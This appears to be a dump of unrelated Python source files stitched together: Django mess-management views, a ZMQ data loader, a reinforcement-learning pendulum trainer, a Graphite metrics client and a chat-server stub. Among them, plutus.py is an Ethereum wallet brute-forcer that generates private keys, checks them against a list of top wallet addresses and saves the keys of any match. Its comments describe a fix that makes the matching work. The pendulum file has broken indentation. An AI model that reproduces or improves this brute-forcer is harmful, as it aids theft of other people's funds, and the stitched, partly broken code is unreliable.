            context = {'menu': menu, 'mess_option': option}
            template = ('messModule/menudownloadable2.html'
                        if option == 'mess2'
                        else 'messModule/menudownloadable1.html')
            return render_to_pdf(template, context)
        # Non-students get the mess-2 menu by default.
        return render_to_pdf('messModule/menudownloadable2.html',
                             {'menu': menu, 'mess_option': 'mess2'})
class MenuPDF1(View):
    """Render the mess-1 menu as a downloadable PDF."""

    def post(self, request, *args, **kwargs):
        context = {'menu': Menu.objects.all(), 'mess_option': 'mess1'}
        return render_to_pdf('messModule/menudownloadable1.html', context)
def menu_change_request(request):
    """
    Return all approved (status == 2) menu change requests as JSON.

    The original passed a QuerySet to ``model_to_dict``, which accepts a
    single model instance and raises at runtime; serialise each row
    explicitly instead.
    """
    pending = Menu_change_request.objects.filter(status=2)
    data = {'requests': list(pending.values())}
    return JsonResponse(data)
def submit_mess_committee(request):
    """Add the student with the posted roll number to the mess committee."""
    result = add_mess_committee(request, request.POST['rollnumber'])
    return JsonResponse(result)
def remove_mess_committee(request):
    """
    Remove a member (committee member or convener) from a mess body.

    Expects POST['member_id'] of the form '<designation>-<roll_number>'.
    Debug ``print`` calls from the original have been removed.
    """
    designation_name, roll_number = request.POST['member_id'].split("-", 1)
    known = {
        'mess_committee_mess1',
        'mess_convener_mess1',
        'mess_committee_mess2',
    }
    # Unknown designations fall back to mess_convener_mess2, matching the
    # original if/elif chain's final else branch.
    if designation_name not in known:
        designation_name = 'mess_convener_mess2'
    designation = Designation.objects.get(name=designation_name)
    remove_object = HoldsDesignation.objects.get(
        Q(user__username=roll_number) & Q(designation=designation))
    remove_object.delete()
    return JsonResponse({
        'status': 1,
        'message': 'Successfully removed '
    })
def get_leave_data(request):
    """
    Report how many students are on leave today and tomorrow.

    Uses the module-level globals ``today_g`` / ``tomorrow_g`` as the
    reference dates; a rebate counts when its date range covers the
    reference day.
    """
    on_leave_today = Rebate.objects.filter(
        Q(start_date__lte=today_g) & Q(end_date__gte=today_g)).count()
    on_leave_tomorrow = Rebate.objects.filter(
        Q(start_date__lte=tomorrow_g) & Q(end_date__gte=tomorrow_g)).count()
    return JsonResponse({
        'status': 1,
        'message': 'HI I AM WORKING',
        'today': today_g.date(),
        'tomorrow': tomorrow_g.date(),
        'counttoday': on_leave_today,
        'counttomorrow': on_leave_tomorrow,
    })
def accept_vacation_leaves(request):
    """
    Accept every pending vacation leave inside the given date range.

    GET params ``start_date`` / ``end_date`` bound the range; matching
    Rebate rows with status '1' (pending) are flipped to '2' (accepted).
    """
    window_start = request.GET['start_date']
    window_end = request.GET['end_date']
    pending = Rebate.objects.filter(
        Q(start_date__gte=window_start)
        & Q(end_date__lte=window_end)
        & Q(leave_type="vacation")
        & Q(status='1'))
    for leave in pending:
        leave.status = '2'
        leave.save()
    return JsonResponse({
        'status': 1,
        'display': 'Vacation Leaves Successfully Accepted'
    })
def select_mess_convener(request):
    """
    Promote a mess committee member to mess convener.

    Expects POST['member_id_add'] as '<designation>-<roll_number>'.  Each
    mess can have only one convener, so the promotion is refused when one
    already exists.  The two near-identical branches of the original have
    been merged; the user-facing messages are preserved byte-for-byte.
    """
    data_m = request.POST['member_id_add'].split("-")
    roll_number = data_m[1]
    if data_m[0] == 'mess_committee_mess1':
        designation = Designation.objects.get(name='mess_committee_mess1')
        new_designation = Designation.objects.get(name='mess_convener_mess1')
        exists_message = ('Mess Convener already exists for Mess 1 ! '
                          '\nRemove the existing convener to add new one')
    else:
        designation = Designation.objects.get(name='mess_committee_mess2')
        new_designation = Designation.objects.get(name='mess_convener_mess2')
        exists_message = ('Mess Convener already exists for Mess 2 ! '
                          '\n Remove the existing convener to add new one')
    # One mess can have only one mess convener.
    if HoldsDesignation.objects.filter(designation=new_designation).count():
        return JsonResponse({'status': 1, 'message': exists_message})
    modify_object = HoldsDesignation.objects.get(
        Q(user__username=roll_number) & Q(designation=designation))
    modify_object.designation = new_designation
    modify_object.save()
    return JsonResponse({
        'status': 1,
        'message': 'Successfully added as mess convener ! '
    })
def download_bill_mess(request):
    """
    Export last month's mess bills as a PDF.

    Bills are selected by the previous calendar month's name and the
    module-level ``year_last_g`` global.  Debug ``print`` statements from
    the original have been removed.
    """
    extra_info = ExtraInfo.objects.get(user=request.user)
    first_day_of_this_month = date.today().replace(day=1)
    last_day_prev_month = first_day_of_this_month - timedelta(days=1)
    previous_month = last_day_prev_month.strftime('%B')
    # NOTE(review): year_last_g may differ from last_day_prev_month.year
    # around a year boundary (January) — confirm which is intended.
    bill_object = Monthly_bill.objects.filter(
        Q(month=previous_month) & Q(year=year_last_g))
    return render_to_pdf('messModule/billpdfexport.html', {'bill': bill_object})
def get_nonveg_order(request):
    """
    Summarise non-veg orders for the posted date.

    Groups Nonveg_data rows for POST['order_date'] by dish and meal
    interval.  The original computed this aggregate and then discarded
    it; it is now returned under the (new, backward-compatible)
    'orders' key.
    """
    order_date = request.POST['order_date']
    orders = Nonveg_data.objects.filter(order_date=order_date) \
        .values('dish__dish', 'order_interval').annotate(total=Count('dish'))
    data = {
        'status': 1,
        'orders': list(orders),
    }
    return JsonResponse(data)
def add_leave_manager(request):
    """
    Register a leave for a student on behalf of the mess manager.

    Validates the posted date range, rejects overlaps with already
    accepted rebates, then stores the leave as pre-accepted (status '2')
    and notifies the student.

    :return: plain HttpResponse on validation failure, redirect to /mess
             on success (same responses as the original; its unused
             ``data`` dicts and ``flag`` variable have been removed).
    """
    start_date = request.POST.get('l_startd')
    end_date = request.POST.get('l_endd')
    roll_number = request.POST.get('l_rollno')
    leave_type = request.POST.get('l_type')  # renamed: 'type' shadowed the builtin
    purpose = request.POST.get('l_purpose')
    student = Student.objects.get(id__id=roll_number)
    if end_date < start_date:
        # ISO yyyy-mm-dd strings compare correctly lexicographically.
        return HttpResponse('Check the dates')
    date_format = "%Y-%m-%d"
    new_start = datetime.strptime(str(start_date), date_format)
    new_end = datetime.strptime(str(end_date), date_format)
    accepted = Rebate.objects.filter(student_id=student, status='2')
    for rebate in accepted:
        existing_start = datetime.strptime(str(rebate.start_date), date_format)
        existing_end = datetime.strptime(str(rebate.end_date), date_format)
        # Two ranges overlap iff each starts before the other ends; this
        # is equivalent to the original's four-clause condition.
        if new_start <= existing_end and new_end >= existing_start:
            return HttpResponse('You are seeing this page : As the leave has been applied for these days already')
    message = ('Your leave request has been accepted between dates '
               + str(new_start.date()) + ' and ' + str(new_end.date()))
    central_mess_notif(request.user, student.id.user, 'leave_request', message)
    Rebate(student_id=student,
           start_date=start_date,
           end_date=end_date,
           purpose=purpose,
           status='2',
           leave_type=leave_type).save()
    return HttpResponseRedirect('/mess')
|
multi.py | #
# Copyright (c) 2017-2021 NVIDIA CORPORATION. All rights reserved.
# This file is part of the WebDataset library.
# See the LICENSE file for licensing terms (BSD-style).
#
"""An alternative to DataLoader using ZMQ.
This implements MultiLoader, an alternative to DataLoader when torch
is not available. Subprocesses communicate with the loader through
ZMQ, provided for high performance multithreaded queueing.
"""
import multiprocessing as mp
import os
import pickle
import uuid
import weakref

import zmq
# Pickle protocol used for all worker <-> loader serialization.
the_protocol = pickle.HIGHEST_PROTOCOL
# Worker processes across all loaders; weak refs let finished processes
# be garbage collected.
all_pids = weakref.WeakSet()
class EOF:
    """Sentinel object signalling that a worker's data stream has ended."""

    def __init__(self, **kw):
        """Attach every keyword argument as an instance attribute."""
        for name, value in kw.items():
            setattr(self, name, value)
def reader(dataset, sockname, index, num_workers):
    """Read samples from the dataset and send them over the socket.

    Sets the WORKER / NUM_WORKERS environment variables so the dataset
    can shard itself, streams every sample as a pickle over a ZMQ PUSH
    socket, and finishes with an EOF marker carrying this reader's index.

    :param dataset: source dataset (iterable of picklable samples)
    :param sockname: name for the socket to send data to
    :param index: index for this reader, used to indicate EOF
    :param num_workers: total number of reader processes
    """
    global the_protocol
    # Bug fix: `os` was used here without ever being imported; the
    # module's import block now provides it.
    os.environ["WORKER"] = str(index)
    os.environ["NUM_WORKERS"] = str(num_workers)
    ctx = zmq.Context.instance()
    sock = ctx.socket(zmq.PUSH)
    sock.connect(sockname)
    for sample in dataset:
        sock.send(pickle.dumps(sample, protocol=the_protocol))
    # EOF(index=...) tells the loader which worker finished.
    sock.send(pickle.dumps(EOF(index=index)))
    sock.close()
class MultiLoader:
    """Alternative to PyTorch DataLoader based on ZMQ."""
    def __init__(
        self, dataset, workers=4, verbose=False, nokill=False, prefix="/tmp/_multi-"
    ):
        """Create a MultiLoader for a dataset.
        This creates ZMQ sockets, spawns `workers` subprocesses, and has them send data
        to the socket.
        :param dataset: source dataset
        :param workers: number of workers
        :param verbose: report progress verbosely
        :param nokill: don't kill old processes when restarting (allows multiple loaders)
        :param prefix: directory prefix for the ZMQ socket
        """
        self.dataset = dataset
        self.workers = workers
        self.verbose = verbose
        self.pids = []  # mp.Process handles; entries become None once a worker finishes
        self.socket = None  # PULL socket, created lazily in __iter__
        self.ctx = zmq.Context.instance()
        self.nokill = nokill
        self.prefix = prefix
    def kill(self):
        """kill."""
        # Terminate all live worker processes and release the PULL socket.
        for pid in self.pids:
            if pid is None:
                continue
            print("killing", pid)
            pid.kill()
            pid.join(1.0)
        self.pids = []
        if self.socket is not None:
            print("closing", self.socket)
            self.socket.close()
            self.socket = None
    def __iter__(self):
        """Return an iterator over this dataloader."""
        if not self.nokill:
            self.kill()
        # Fresh unique IPC endpoint per iteration so restarts don't collide.
        self.sockname = "ipc://" + self.prefix + str(uuid.uuid4())
        self.socket = self.ctx.socket(zmq.PULL)
        self.socket.bind(self.sockname)
        if self.verbose:
            print("#", self.sockname)
        self.pids = [None] * self.workers
        for index in range(self.workers):
            args = (self.dataset, self.sockname, index, self.workers)
            self.pids[index] = mp.Process(target=reader, args=args)
        all_pids.update(self.pids)
        for pid in self.pids:
            pid.start()
        count = 0
        # Keep pulling until every worker slot has been cleared to None;
        # each worker sends an EOF marker carrying its index when done.
        while self.pids.count(None) < len(self.pids):
            data = self.socket.recv()
            sample = pickle.loads(data)
            if isinstance(sample, EOF):
                if self.verbose:
                    print("# subprocess finished", sample.index)
                self.pids[sample.index].join(1.0)
                self.pids[sample.index] = None
            else:
                yield sample
                count += 1
|
plutus.py | # Plutus Ethereum Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
# Added fastecdsa - June 2019 - Ian McMurray
# Modified for Ethereum - December 2021 - LongWayHomie
from eth_account import Account
import multiprocessing
import time
def generate_key():
    """Create a fresh Ethereum account and return its key material.

    Returns a dict holding the raw private key under "private_key" and
    the eth_account account object under "public_key" (the key name is
    kept for compatibility with the original).
    """
    account = Account.create('12345678')
    return {
        "private_key": account.privateKey,
        "public_key": account,
    }
def process(private_key, public_key, address, database):
    """Check one generated address against the target database.

    On a hit, append the private key and address to results.txt;
    otherwise just log the generated address to stdout.
    """
    addr = address.address
    if addr in database:
        with open('results.txt', 'a') as results:
            results.write('Hex private key: ' + str(private_key.hex()) + '\n' +
                          'Public address: ' + str(addr) + '\n' +
                          'Address: ' + str(addr) + '\n\n')
    else:
        print("Ethereum Wallet: " + addr)
def main(database):
    """Generate keys forever, checking each address against the database."""
    while True:
        keypair = generate_key()
        private_key = keypair["private_key"]
        account = keypair["public_key"]
        # The original guarded against a -1 sentinel that generate_key
        # never produces; the check is kept for fidelity.
        if account != -1:
            process(private_key, keypair["public_key"], account, database)
if __name__ == '__main__':
    # Bug fix: the original wrapped the set in a list, so the membership
    # test `address in database` inside process() compared an address
    # string against a set object and was always False.  Load the
    # database as a plain set, and close the file deterministically.
    with open('database/top100.txt') as wallet_file:
        database = set(line.strip() for line in wallet_file)
    print('Starting Ethereum Brute-Forcer...')
    print('Ethereum list of wallets loaded')
    time.sleep(1)
    print('Executing...')
    for cpu in range(multiprocessing.cpu_count()):
        multiprocessing.Process(target=main, args=(database,)).start()
|
10_pendulum_ddpg_attention_main.py | # https://github.com/openai/gym/blob/master/gym/envs/classic_control/pendulum.py
# https://mspries.github.io/jimmy_pendulum.html
#!/usr/bin/env python3
import time
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from torch import optim
import os, sys
import numpy as np
current_path = os.path.dirname(os.path.realpath(__file__))
PROJECT_HOME = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir))
if PROJECT_HOME not in sys.path:
sys.path.append(PROJECT_HOME)
from codes.f_utils.common_utils import make_gym_env, smooth
from common.fast_rl.policy_based_model import unpack_batch_for_ddpg
from common.fast_rl.rl_agent import float32_preprocessor
print(torch.__version__)
from common.fast_rl import actions, experience, policy_based_model, rl_agent, experience_single
from common.fast_rl.common import statistics, utils
from config.parameters import PARAMETERS as params
from collections import deque
# Directory where periodic and final model checkpoints are written.
MODEL_SAVE_DIR = os.path.join(PROJECT_HOME, "out", "model_save_files")
if not os.path.exists(MODEL_SAVE_DIR):
    os.makedirs(MODEL_SAVE_DIR)
# Work around duplicate OpenMP runtime loading (common with torch + MKL).
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
# Use CUDA only when available AND enabled in the experiment parameters.
if torch.cuda.is_available():
    device = torch.device("cuda" if params.CUDA else "cpu")
else:
    device = torch.device("cpu")
# Interval (in update steps) for a hard target-network sync; only used by
# the commented-out hard-update path in model_update().
target_update_period = 100
# Rolling window of recent states plus its window length; used only by
# commented-out experiment code in play_func().
state_deque = deque(maxlen=30)
step_length = 4
def play_func(exp_queue, env, net):
    """Actor process: run the environment with a DDPG agent and stream
    experience tuples into exp_queue for the learner process.

    :param exp_queue: mp.Queue receiving experience items (None = finished)
    :param env: gym environment instance
    :param net: actor network shared with the learner
    """
    print(env.action_space.low[0], env.action_space.high[0])
    action_min = env.action_space.low[0]
    action_max = env.action_space.high[0]
    #action_selector = actions.EpsilonGreedyDDPGActionSelector(epsilon=params.EPSILON_INIT)
    # Epsilon-greedy exploration with Ornstein-Uhlenbeck noise enabled.
    action_selector = actions.EpsilonGreedyDDPGActionSelector(epsilon=params.EPSILON_INIT, ou_enabled=True, scale_factor=2.0)
    epsilon_tracker = actions.EpsilonTracker(
        action_selector=action_selector,
        eps_start=params.EPSILON_INIT,
        eps_final=params.EPSILON_MIN,
        eps_frames=params.EPSILON_MIN_STEP
    )
    agent = rl_agent.AgentDDPG(
        net, n_actions=1, action_selector=action_selector,
        action_min=action_min, action_max=action_max, device=device, preprocessor=float32_preprocessor
    )
    experience_source = experience_single.ExperienceSourceSingleEnvFirstLast(
        env, agent, gamma=params.GAMMA, steps_count=params.N_STEP
    )
    # experience_source = experience.ExperienceSourceFirstLast(
    #     env, agent, gamma=params.GAMMA, steps_count=params.N_STEP
    # )
    exp_source_iter = iter(experience_source)
    if params.DRAW_VIZ:
        stat = statistics.StatisticsForPolicyBasedRL(method="policy_gradient")
    else:
        stat = None
    step_idx = 0
    next_save_frame_idx = params.MODEL_SAVE_STEP_PERIOD
    with utils.RewardTracker(params=params, frame=False, stat=stat) as reward_tracker:
        while step_idx < params.MAX_GLOBAL_STEP:
            # Advance one step and put the experience into exp_queue
            # (translated from the original Korean comment).
            step_idx += 1
            exp = next(exp_source_iter)
            exp_queue.put(exp)
            # NOTE(review): 'udpate' looks like a typo of 'update', but it
            # must match whatever EpsilonTracker actually defines — confirm
            # against the project's actions module before renaming.
            epsilon_tracker.udpate(step_idx)
            episode_rewards = experience_source.pop_episode_reward_lst()
            if episode_rewards:
                solved, mean_episode_reward = reward_tracker.set_episode_reward(
                    episode_rewards[0], step_idx, epsilon=action_selector.epsilon
                )
                # Periodic checkpoint.
                if step_idx >= next_save_frame_idx:
                    rl_agent.save_model(
                        MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
                    )
                    next_save_frame_idx += params.MODEL_SAVE_STEP_PERIOD
                # Final checkpoint once the tracker reports the task solved.
                if solved:
                    rl_agent.save_model(
                        MODEL_SAVE_DIR, params.ENVIRONMENT_ID.value, net.__name__, net, step_idx, mean_episode_reward
                    )
                    break
    # None signals the learner that this actor is done.
    exp_queue.put(None)
def main():
    """Learner entry point: spawn the actor process, then train the DDPG
    actor/critic networks from experience pulled off the shared queue."""
    mp.set_start_method('spawn')
    env = make_gym_env(params.ENVIRONMENT_ID.value, seed=params.SEED)
    print("env:", params.ENVIRONMENT_ID)
    print("observation_space:", env.observation_space)
    print("action_space:", env.action_space)
    # GRU + attention actor/critic; sizes match Pendulum's 3-dim
    # observation and single continuous action.
    actor_net = policy_based_model.DDPGGruAttentionActor(
        obs_size=3,
        hidden_size=128,
        n_actions=1,
        bidirectional=False,
        scale=2.0
    ).to(device)
    critic_net = policy_based_model.DDPGGruAttentionCritic(
        obs_size=3,
        hidden_size_1=128, hidden_size_2=64,
        n_actions=1,
        bidirectional=False
    ).to(device)
    print(actor_net)
    print(critic_net)
    target_actor_net = rl_agent.TargetNet(actor_net)
    target_critic_net = rl_agent.TargetNet(critic_net)
    actor_optimizer = optim.Adam(actor_net.parameters(), lr=params.ACTOR_LEARNING_RATE)
    critic_optimizer = optim.Adam(critic_net.parameters(), lr=params.LEARNING_RATE)
    buffer = experience.ExperienceReplayBuffer(experience_source=None, buffer_size=params.REPLAY_BUFFER_SIZE)
    # buffer = experience.PrioritizedReplayBuffer(
    #     experience_source=None, buffer_size=params.REPLAY_BUFFER_SIZE, n_step=params.N_STEP
    # )
    exp_queue = mp.Queue(maxsize=params.TRAIN_STEP_FREQ * 2)
    play_proc = mp.Process(target=play_func, args=(exp_queue, env, actor_net))
    play_proc.start()
    time.sleep(0.5)
    if params.DRAW_VIZ:
        #stat_for_ddpg = statistics.StatisticsForDDPGOptimization(n_actions=1)
        stat_for_ddpg = statistics.StatisticsForSimpleDDPGOptimization(n_actions=1)
    else:
        stat_for_ddpg = 0.0
    step_idx = 0
    # Smoothed diagnostics carried across model_update() calls.
    actor_grad_l2 = 0.0
    actor_grad_max = 0.0
    actor_grad_variance = 0.0
    critic_grad_l2 = 0.0
    critic_grad_max = 0.0
    critic_grad_variance = 0.0
    loss_actor = 0.0
    loss_critic = 0.0
    loss_total = 0.0
    while play_proc.is_alive():
        step_idx += params.TRAIN_STEP_FREQ
        exp = None
        # Drain TRAIN_STEP_FREQ experiences from the actor into the buffer.
        for _ in range(params.TRAIN_STEP_FREQ):
            exp = exp_queue.get()
            if exp is None:
                # Actor finished; wait for it and stop draining.
                play_proc.join()
                break
            buffer._add(exp)
        if len(buffer) < params.MIN_REPLAY_SIZE_FOR_TRAIN:
            continue
        # last_state is None marks an episode boundary in FirstLast
        # experience sources — presumably training happens once per
        # episode end; confirm against the experience module.
        if exp is not None and exp.last_state is None:
            for _ in range(3):
                actor_grad_l2, actor_grad_max, actor_grad_variance, critic_grad_l2, critic_grad_max, critic_grad_variance, loss_actor, loss_critic, loss_total = model_update(
                    buffer, actor_net, critic_net, target_actor_net, target_critic_net, actor_optimizer, critic_optimizer,
                    step_idx, actor_grad_l2, actor_grad_max, actor_grad_variance,
                    critic_grad_l2, critic_grad_max, critic_grad_variance,
                    loss_actor, loss_critic, loss_total, per=False
                )
            if params.DRAW_VIZ:
                stat_for_ddpg.draw_optimization_performance(
                    step_idx, exp.noise, exp.action
                )
def model_update(buffer, actor_net, critic_net, target_actor_net, target_critic_net, actor_optimizer, critic_optimizer,
                 step_idx, actor_grad_l2, actor_grad_max, actor_grad_variance,
                 critic_grad_l2, critic_grad_max, critic_grad_variance,
                 loss_actor, loss_critic, loss_total, per):
    """Run one DDPG optimization step (critic first, then actor) on a
    sampled batch, soft-sync the target networks, and fold the gradient
    and loss statistics into the passed-in running values.

    :param per: when True, use prioritized replay sampling and apply
                importance-sampling weights to the critic loss.
    :return: the nine smoothed diagnostics, in the order received.
    """
    global target_update_period
    if per:
        batch, batch_indices, batch_weights = buffer.sample(params.BATCH_SIZE)
    else:
        batch = buffer.sample(params.BATCH_SIZE)
        batch_indices, batch_weights = None, None
    batch_states_v, batch_actions_v, batch_rewards_v, batch_dones_mask, batch_last_states_v = unpack_batch_for_ddpg(
        batch, device
    )
    # --- critic update: TD target built from the target networks ---
    critic_optimizer.zero_grad()
    batch_q_v = critic_net(batch_states_v, batch_actions_v)
    batch_last_act_v = target_actor_net.target_model(batch_last_states_v)
    batch_q_last_v = target_critic_net.target_model(batch_last_states_v, batch_last_act_v)
    # Terminal transitions contribute no bootstrap value.
    batch_q_last_v[batch_dones_mask] = 0.0
    batch_target_q_v = batch_rewards_v.unsqueeze(dim=-1) + batch_q_last_v * params.GAMMA ** params.N_STEP
    if per:
        batch_l1_loss = F.smooth_l1_loss(batch_q_v, batch_target_q_v.detach(), reduction='none')  # for PER
        batch_weights_v = torch.tensor(batch_weights)
        loss_critic_v = batch_weights_v * batch_l1_loss
        buffer.update_priorities(batch_indices, batch_l1_loss.detach().cpu().numpy() + 1e-5)
        buffer.update_beta(step_idx)
    else:
        loss_critic_v = F.smooth_l1_loss(batch_q_v, batch_target_q_v.detach())
    loss_critic_v.mean().backward()
    critic_grads = np.concatenate([p.grad.data.cpu().numpy().flatten()
                                   for p in critic_net.parameters()
                                   if p.grad is not None])
    critic_optimizer.step()
    # --- actor update: ascend the critic's Q for the actor's actions ---
    actor_optimizer.zero_grad()
    batch_current_actions_v = actor_net(batch_states_v)
    actor_loss_v = -critic_net(batch_states_v, batch_current_actions_v)
    loss_actor_v = actor_loss_v.mean()
    loss_actor_v.backward()
    actor_grads = np.concatenate([p.grad.data.cpu().numpy().flatten()
                                  for p in actor_net.parameters()
                                  if p.grad is not None])
    actor_optimizer.step()
    # Soft (Polyak) target updates with tau = 0.001.
    target_actor_net.alpha_sync(alpha=1.0 - 0.001)
    target_critic_net.alpha_sync(alpha=1.0 - 0.001)
    # Exponentially smoothed diagnostics for logging/plotting.
    actor_grad_l2 = smooth(actor_grad_l2, np.sqrt(np.mean(np.square(actor_grads))))
    actor_grad_max = smooth(actor_grad_max, np.max(np.abs(actor_grads)))
    actor_grad_variance = smooth(actor_grad_variance, float(np.var(actor_grads)))
    critic_grad_l2 = smooth(critic_grad_l2, np.sqrt(np.mean(np.square(critic_grads))))
    critic_grad_max = smooth(critic_grad_max, np.max(np.abs(critic_grads)))
    critic_grad_variance = smooth(critic_grad_variance, float(np.var(critic_grads)))
    loss_actor = smooth(loss_actor, loss_actor_v.item())
    loss_critic = smooth(loss_critic, loss_critic_v.mean().item())
    loss_total = smooth(loss_total, loss_actor_v.item() + loss_critic_v.mean().item())
    return actor_grad_l2, actor_grad_max, actor_grad_variance, critic_grad_l2, critic_grad_max, critic_grad_variance, loss_actor, loss_critic, loss_total
if __name__ == "__main__":
main() |
graphyte.py | """Send data to Graphite metrics server (synchronously or on a background thread).
For example usage, see README.rst.
This code is licensed under a permissive MIT license -- see LICENSE.txt.
The graphyte project lives on GitHub here:
https://github.com/benhoyt/graphyte
"""
import atexit
import logging
try:
import queue
except ImportError:
import Queue as queue # Python 2.x compatibility
import socket
import threading
import time
__all__ = ['Sender', 'init', 'send']
__version__ = '1.6.0'
# Module-level Sender configured by init() and used by the send() helper.
default_sender = None
logger = logging.getLogger(__name__)
def _has_whitespace(value):
return not value or value.split(None, 1)[0] != value
class Sender:
def __init__(self, host, port=2003, prefix=None, timeout=5, interval=None,
queue_size=None, log_sends=False, protocol='tcp', batch_size=1000, tags={}):
"""Initialize a Sender instance, starting the background thread to
send messages at given interval (in seconds) if "interval" is not
None. Send at most "batch_size" messages per socket send operation (default=1000).
Default protocol is TCP; use protocol='udp' for UDP.
"""
self.host = host
self.port = port
self.prefix = prefix
self.timeout = timeout
self.interval = interval
self.log_sends = log_sends
self.protocol = protocol
self.batch_size = batch_size
self.tags = tags
if self.interval is not None:
if queue_size is None:
queue_size = int(round(interval)) * 100
self._queue = queue.Queue(maxsize=queue_size)
self._thread = threading.Thread(target=self._thread_loop)
self._thread.daemon = True
self._thread.start()
atexit.register(self.stop)
    def __del__(self):
        # Best-effort cleanup: make sure the background sender thread is
        # stopped when the Sender is garbage collected.
        self.stop()
def stop(self):
"""Tell the sender thread to finish and wait for it to stop sending
(should be at most "timeout" seconds).
"""
if self.interval is not None:
self._queue.put_nowait(None)
self._thread.join()
self.interval = None
def build_message(self, metric, value, timestamp, tags={}):
"""Build a Graphite message to send and return it as a byte string."""
if _has_whitespace(metric):
raise ValueError('"metric" must not have whitespace in it')
if not isinstance(value, (int, float)):
raise TypeError('"value" must be an int or a float, not a {}'.format(
type(value).__name__))
default_tags = self.tags.copy()
default_tags.update(tags)
tags_strs = [u';{}={}'.format(k, v) for k, v in sorted(default_tags.items())]
if any(_has_whitespace(t) for t in tags_strs):
raise ValueError('"tags" keys and values must not have whitespace in them')
tags_suffix = ''.join(tags_strs)
message = u'{}{}{} {} {}\n'.format(
self.prefix + '.' if self.prefix else '',
metric,
tags_suffix,
value,
int(round(timestamp))
)
message = message.encode('utf-8')
return message
def send(self, metric, value, timestamp=None, tags={}):
"""Send given metric and (int or float) value to Graphite host.
Performs send on background thread if "interval" was specified when
creating this Sender.
If a "tags" dict is specified, send the tags to the Graphite host along with the metric.
"""
if timestamp is None:
timestamp = time.time()
message = self.build_message(metric, value, timestamp, tags)
if self.interval is None:
self.send_socket(message)
else:
try:
self._queue.put_nowait(message)
except queue.Full:
logger.error('queue full when sending {!r}'.format(message))
def send_message(self, message):
    """Deliver one message (bytes) over a fresh TCP or UDP socket."""
    # Validate up front so an unsupported protocol fails before any
    # socket work happens.
    if self.protocol not in ('tcp', 'udp'):
        raise ValueError('"protocol" must be \'tcp\' or \'udp\', not {!r}'.format(self.protocol))
    if self.protocol == 'tcp':
        sock = socket.create_connection((self.host, self.port), self.timeout)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            sock.sendall(message)
        finally:  # sockets don't support "with" statement on Python 2.x
            sock.close()
    else:
        # UDP: fire-and-forget datagram.
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.sendto(message, (self.host, self.port))
        finally:
            sock.close()
def send_socket(self, message):
    """Low-level function to send message bytes to this Sender's socket.
    You should usually call send() instead of this function (unless you're
    subclassing or writing unit tests).
    """
    start_time = time.time() if self.log_sends else None
    try:
        self.send_message(message)
    except Exception as error:
        # Sending is best-effort: log the failure instead of propagating.
        logger.error('error sending message {!r}: {}'.format(message, error))
    else:
        if self.log_sends:
            elapsed_time = time.time() - start_time
            logger.info('sent message {!r} to {}:{} in {:.03f} seconds'.format(
                message, self.host, self.port, elapsed_time))
def _thread_loop(self):
    """Background thread used when Sender is in asynchronous/interval mode."""
    last_check_time = time.time()
    messages = []
    while True:
        # Get first message from queue, blocking until the next time we
        # should be sending
        time_since_last_check = time.time() - last_check_time
        time_till_next_check = max(0, self.interval - time_since_last_check)
        try:
            message = self._queue.get(timeout=time_till_next_check)
        except queue.Empty:
            # Timed out with nothing queued; fall through to the
            # interval check below so periodic flushes still happen.
            pass
        else:
            if message is None:
                # None is the signal to stop this background thread
                break
            messages.append(message)
            # Get any other messages currently on queue without blocking,
            # paying attention to None ("stop thread" signal)
            should_stop = False
            while True:
                try:
                    message = self._queue.get_nowait()
                except queue.Empty:
                    break
                if message is None:
                    should_stop = True
                    break
                messages.append(message)
            if should_stop:
                break
        # If it's time to send, send what we've collected
        current_time = time.time()
        if current_time - last_check_time >= self.interval:
            last_check_time = current_time
            # Send in batches of batch_size messages joined into one payload.
            for i in range(0, len(messages), self.batch_size):
                batch = messages[i:i + self.batch_size]
                self.send_socket(b''.join(batch))
            messages = []
    # Send any final messages before exiting thread
    for i in range(0, len(messages), self.batch_size):
        batch = messages[i:i + self.batch_size]
        self.send_socket(b''.join(batch))
def init(*args, **kwargs):
    """Create the module-level default Sender from the given arguments."""
    global default_sender
    default_sender = Sender(*args, **kwargs)
def send(*args, **kwargs):
    """Forward to the module-level default Sender's send()."""
    default_sender.send(*args, **kwargs)
if __name__ == '__main__':
    # Command-line one-shot: send a single metric value to Graphite.
    import argparse

    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('metric',
                            help='name of metric to send')
    arg_parser.add_argument('value', type=float,
                            help='numeric value to send')
    arg_parser.add_argument('-s', '--server', default='localhost',
                            help='hostname of Graphite server to send to, default %(default)s')
    arg_parser.add_argument('-p', '--port', type=int, default=2003,
                            help='port to send message to, default %(default)d')
    arg_parser.add_argument('-u', '--udp', action='store_true',
                            help='send via UDP instead of TCP')
    arg_parser.add_argument('-t', '--timestamp', type=int,
                            help='Unix timestamp for message (defaults to current time)')
    arg_parser.add_argument('-q', '--quiet', action='store_true',
                            help="quiet mode (don't log send to stdout)")
    opts = arg_parser.parse_args()

    if not opts.quiet:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    one_shot_sender = Sender(opts.server, port=opts.port, log_sends=not opts.quiet,
                             protocol='udp' if opts.udp else 'tcp')
    one_shot_sender.send(opts.metric, opts.value, timestamp=opts.timestamp)
|
class_04_server.py | #!/usr/bin/python
# -*- coding: utf8 -*-
# auth : https://blog.naver.com/hdh0926
import socket
import select
import sys
import threading
import time
"""The first argument AF_INET is the address domain of the
socket. This is used when we have an Internet Domain with
any two hosts The second argument is the type of socket.
SOCK_STREAM means that data or characters are read in
a continuous flow."""
# Listening TCP socket for the chat server; SO_REUSEADDR lets the server
# be restarted without waiting for the old socket's TIME_WAIT to expire.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# python .\python\standard\class_01_server.py 127.0.0.1 8888
# checks whether sufficient arguments have been provided
if len(sys.argv) != 3:
    print("Correct usage: script, IP address, port number")
    print("python .\python\standard\class_01_server.py 127.0.0.1 8888")
    exit()
# takes the first argument from command prompt as IP address
IP_address = str(sys.argv[1])
# takes second argument from command prompt as port number
Port = int(sys.argv[2])
"""
binds the server to an entered IP address and at the
specified port number.
The client must be aware of these parameters
"""
